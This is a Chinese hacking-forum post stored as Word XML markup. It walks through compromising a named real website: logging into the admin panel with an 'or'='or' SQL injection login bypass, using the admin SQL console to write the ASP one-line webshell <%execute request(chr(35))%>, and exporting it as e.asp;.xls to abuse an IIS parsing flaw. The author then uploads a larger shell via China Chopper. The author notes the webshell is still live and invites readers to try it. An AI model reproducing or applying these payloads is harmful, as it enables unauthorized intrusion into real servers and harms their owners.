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355" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="11355"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF12ED" w:rsidRPr="00DF12ED" w:rsidTr="00DF12ED">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr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来哈客有很长时间了，感觉气氛很好啊，也想着该发点东西了，属于菜鸟级别的东西，大牛勿喷啊</w:t>
            </w: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小波的教程“没有办法的办法拿shell”中，拿webshell用的是猜ftp帐号密码的方法，其实在后台的执行sql的地方是可以通过access导出一句话拿webshell的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hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DF12ED">
                <w:rPr>
                  <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                  <w:color w:val="336699"/>
                  <w:kern w:val="0"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://www.yhzb.com/admin/login.asp</w:t>
              </w:r>
            </w:hyperlink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336699"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5143500" cy="2133600"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="127" name="aimg_1923" descr="1.jpg">
                    <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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3" descr="1.jpg">
                            <a:hlinkClick r:id="rId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05pt;height:168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万能密码’or’=’or’登录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2905125"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="129" name="aimg_1924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4" descr="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 id="_x0000_i1026" type="#_x0000_t75" alt="" style="width:414.75pt;height:211.5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点“服务器信息探测”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619750" cy="3543300"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="131" name="aimg_1925" descr="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5" descr="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543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 id="_x0000_i1027" type="#_x0000_t75" alt="" style="width:414.75pt;height:261.75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获得网站路径：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF12ED">
              <w:rPr>
                <w:rFonts w:ascii="ˎ̥" w:eastAsia="宋体" w:hAnsi="ˎ̥" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>d:\freehost\yinhezb\web\admin\aspcheck.asp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进入“系统管理”-》“自定义执行SQL”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2143125"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="133" name="aimg_1927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7" descr="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 id="_x0000_i1028" type="#_x0000_t75" alt="" style="width:414.75pt;height:156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试了试，能够执行，所以这里可以用access导一句话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1.create table a (avarchar(50))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建立一个有一个a字段的表,表名为a,字段类型为字符,长度为50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 id="_x0000_i1029" type="#_x0000_t75" alt="" style="width:162pt;height:91.5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2057400" cy="1162050"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="136" name="aimg_1928" descr="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8" descr="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2.insert into a (a)values('&lt;%execute request(chr(35))%&gt;')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在表a的a字段插入密码为#的一句话木马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3.select * into [a] in'</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF12ED">
              <w:rPr>
                <w:rFonts w:ascii="ˎ̥" w:eastAsia="宋体" w:hAnsi="ˎ̥" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF12ED">
              <w:rPr>
                <w:rFonts w:ascii="ˎ̥" w:eastAsia="宋体" w:hAnsi="ˎ̥" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>d:\freehost\yinhezb\web\admin\</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF12ED">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>e.asp;.xls' 'excel 4.0;' from a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把表a的内容导出为物理路径的一个EXCEL文件，为什么用excel文件,因为ACCESS数据库不允许导出其他危险格式。我们</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF12ED">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>导出为EXCEL后在利用IIS解析漏洞就可以变成我们的小马了。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4. drop table a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在IE地址栏打开：</w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00DF12ED">
                <w:rPr>
                  <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                  <w:color w:val="336699"/>
                  <w:kern w:val="0"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://www.yhzb.com/admin/e.asp;.xls</w:t>
              </w:r>
            </w:hyperlink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336699"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="2667000"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="137" name="aimg_1929" descr="6.jpg">
                    <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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9" descr="6.jpg">
                            <a:hlinkClick r:id="rId1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 id="_x0000_i1030" type="#_x0000_t75" alt="" style="width:414.75pt;height:194.25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呵呵，很熟悉吧，说明一句话写入成功了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我们用菜刀链接，上传大马，如图：</w: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2781300"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="139" name="aimg_1926" descr="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926" descr="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pict>
                <v:shape id="_x0000_i1031" type="#_x0000_t75" alt="" style="width:370.5pt;height:39pt"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF12ED" w:rsidRPr="00DF12ED" w:rsidRDefault="00DF12ED" w:rsidP="00DF12E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F12ED">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>就到这吧，很简单，原理大致和php网站的outfile差不多，以前也有人介绍过</w:t>
            </w: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  <w:t>其实这篇文章早在3月份就写好了，不过一直没发，今天看了看webshell还在，呵呵，懒得涂地址了，没用过的朋友实战下吧，不要乱搞就好</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF12ED">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>强烈建议下管理，如果文章不算原创，也别扣我分了啊，就剩一分了，呜呜！</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DF12ED" w:rsidRPr="00DF12ED" w:rsidRDefault="00DF12ED" w:rsidP="00DF12ED">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:ind w:left="720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hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DF12ED">
          <w:rPr>
            <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>7.jpg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DF12ED">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF12ED">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">(26.92 KB, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF12ED">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>下载次数</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF12ED">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF12ED" w:rsidRPr="00DF12ED" w:rsidRDefault="00DF12ED" w:rsidP="00DF12ED">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left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999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="990600"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="141" name="aimg_193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30" descr="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866" w:rsidRDefault="00B11866">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B11866" w:rsidSect="00B11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631C6"/>
    <w:rsid w:val="00B11866"/>
    <w:rsid w:val="00DF12ED"/>
    <w:rsid w:val="00E631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8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12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F12ED"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DF12ED"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mbn">
    <w:name w:val="mbn"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00DF12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DF12ED"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF12E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F12E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w.hake.cc/forum.php?mod=attachment&amp;aid=MTkzMHw0N2RkYTc1MXwxMzE5NTY2NDM3fDgxNTI%3D&amp;nothumb=y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://www.yhzb.com/admin/e.asp;.xls" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.yhzb.com/admin/login.asp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2011-10-26T12:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-10-26T12:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>